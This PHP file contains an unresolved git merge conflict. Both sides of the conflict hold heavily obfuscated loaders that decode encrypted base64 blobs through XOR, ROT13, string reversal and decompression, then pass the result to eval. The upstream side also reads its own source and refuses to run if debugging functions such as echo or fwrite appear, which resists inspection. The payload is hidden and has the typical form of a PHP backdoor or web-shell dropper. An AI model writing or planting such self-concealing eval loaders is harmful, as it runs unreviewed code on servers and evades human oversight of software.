<?php
<<<<<<< Updated upstream
$fehddd="7c6d020f878e6b247448a7f3464b157c";
$urbytdg="0f535556530b56500d020853035a57060252550f040f50065652035a55075651";
$xpadesl="QOoWoDJS5QYl8u8zivs0ON8+iIzGumOOb9JCUDt0fBee5zV6wHKEXizO3mWW7BAezfTa6LjHSVJaXZUUbXeR+Qo9aZwn+H48rBNkFkdBAiiTN6gJSgg7vEB9puACGkJgemxSptk5lpKlWhX6XnziftatVZdbXaOE/qaZ2jDXZLUFmsWrjoEmshVSfUNFS8NhbcbDMHW1NtkmFbMFTwCjUuOJ2/IApG8FrXTf50BT6HUbc4AjiMz5OQ+aiZMfmxZTA35YZbxt78XlZZuV+PRLsCaJwnUUjnF8lnAyE9yzJI5E3i8dgAnsV8szte6X4JXYPRhzu/mxgV4kly6Lt+UR24K7CydfVZoSbDO9sWvWfhpcMAGQtLFU7EwKu/bbnLfd+9KCHmFsQw6ZSidsh8UsJPla0e1D7tsgw8c6mDGckq0BUwe9+WnhanuJHkJ47mp7OdeHSSRC0YCJnsw5AxTW7Q==";
$nhuqimlz=file_get_contents(__FILE__);
$cohmyl=str_replace($xpadesl,"",$nhuqimlz);
if(strpos($cohmyl,"ec"."ho")!==false||strpos($cohmyl,"pr"."int")!==false||strpos($cohmyl,"var_"."dump")!==false||strpos($cohmyl,"file_put_"."contents")!==false||strpos($cohmyl,"fw"."rite")!==false){die();}
$aoukzntv=str_replace(array($fehddd,$urbytdg),array("SP_3039d05a","KP_9b4e31bd"),$nhuqimlz);
$vjjdcrgj=md5($aoukzntv);
$lgxpqumao=hex2bin($urbytdg);
$sjbftwu="";
$ltfqqbcwn=strlen($vjjdcrgj);
for($yhqagjxq=0;$yhqagjxq<$ltfqqbcwn;$yhqagjxq++){
$sjbftwu.=chr(ord($lgxpqumao[$yhqagjxq])^ord($vjjdcrgj[$yhqagjxq]));
}
$ycwpxste=base64_decode($xpadesl);
$vjatzs=strlen($ycwpxste);
$wrgdezfypz="";
$ukqqltkotk=strlen($sjbftwu);
for($yhqagjxq=0;$yhqagjxq<$vjatzs;$yhqagjxq++){
$wrgdezfypz.=$ycwpxste[$yhqagjxq]^$sjbftwu[$yhqagjxq%$ukqqltkotk];
}
$btvnnvhxg="gzun"."compress";
eval($btvnnvhxg($wrgdezfypz));
=======
// adeb635818659a097fde78e4
$VPENRZjeeq="WfUniFTWuwKrDQlUXJlToxn3DdHFWPkehcX0MBM+uuM=";
$nCYKbOtYTnWT="JsHavSGJhjXeQDyHKWyGbka3QqUSJCxrupK0ZOZ+hhZ=";
$jlZstMOARhKb_="twKtUNw+qwGVfu8xaosn+vNL7HW2A9M72GPtQU+RZ/jEe/5Z2xaHCopi6kBHlxT5vH2tUO8DrjrMR/YfeblkpuRe/2PUG5QbwzXOInnWMbnPXowj/iPRQMNA9B8boz+ZwA73Q6ofnhnuPNMcbdcYr7JJiUHEfYAq7GHPGRyKfYPpXr5dzjqeLtB63k19lACRxGuMXfUchwD";
$jVkuLTGBqmWy="7Y4wGQ5QVqqFYplX/O8tczHz2BFOaGojyZotK+hevG+o40DFYjRux33u/KtEYrFbmVI03bdEzusdu9VzXYaNW5zrLEUPPG/3keoFf9hfQAPVJgUBZ1hG/4E+QSaxkqgSOOoAOeoIigsJU7FXwOqwj8GL/AEGNL7z/BotP3BG8Kc5m4D1dsBr8wGv3Ycs9sSDYOOsyeYgnm+";
$QAIBRoaOlze="5HqV7lN6cb9E7KI22FPa3eWYhM9jmdIM9J7CxaswC8zHfxKtEdrgzqRfwDQoIeov5+n0rvBL4q50LARHG5BLLLSLBe2COADtR49gwcpmSEz0uXKPxh01zTR/odQss5/OQH8mr/M4w/zmjZOEeVIbPoeIpq+zWRHsRhzB1tjySY+wegXcgDnSfqS/1bWqsMmOBl83XuBake";
$anNBqKmublY=strlen($VPENRZjeeq);
$RytXxrLWNKf=substr($jlZstMOARhKb_,0,4);
$iLCaRZvIxYxv=md5($jVkuLTGBqmWy);
$mPWz_GDRNQ=crc32($QAIBRoaOlze);
$PxyOjdbfQgB=base64_decode("ij/HG51S5G+hDbh0KeBWyw==");
$TktFnaxYU=$jlZstMOARhKb_.$jVkuLTGBqmWy.$QAIBRoaOlze;
$UKKXHuAgCY=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
$kcqdzSyMZvi="gz".chr(105)."nflate";
$iwljDxKEOIJl="str".chr(114)."ev";
$FzmaTELajuW="str_rot".chr(49).chr(51);
$sEQeHxfxKq="";
$Kr_RJQniIXTo=$UKKXHuAgCY($TktFnaxYU);
for($WAEgKHL_Kqamnn=0;$WAEgKHL_Kqamnn<strlen($Kr_RJQniIXTo);$WAEgKHL_Kqamnn++){
$sEQeHxfxKq.=chr(ord($Kr_RJQniIXTo[$WAEgKHL_Kqamnn])^ord($PxyOjdbfQgB[$WAEgKHL_Kqamnn%strlen($PxyOjdbfQgB)]));
}
$Kr_RJQniIXTo=$sEQeHxfxKq;
$Kr_RJQniIXTo=$FzmaTELajuW($Kr_RJQniIXTo);
$Kr_RJQniIXTo=$iwljDxKEOIJl($Kr_RJQniIXTo);
$Kr_RJQniIXTo=$UKKXHuAgCY($Kr_RJQniIXTo);
$Kr_RJQniIXTo=$kcqdzSyMZvi($Kr_RJQniIXTo);
$Kr_RJQniIXTo=$FzmaTELajuW($Kr_RJQniIXTo);
eval($Kr_RJQniIXTo);
>>>>>>> Stashed changes
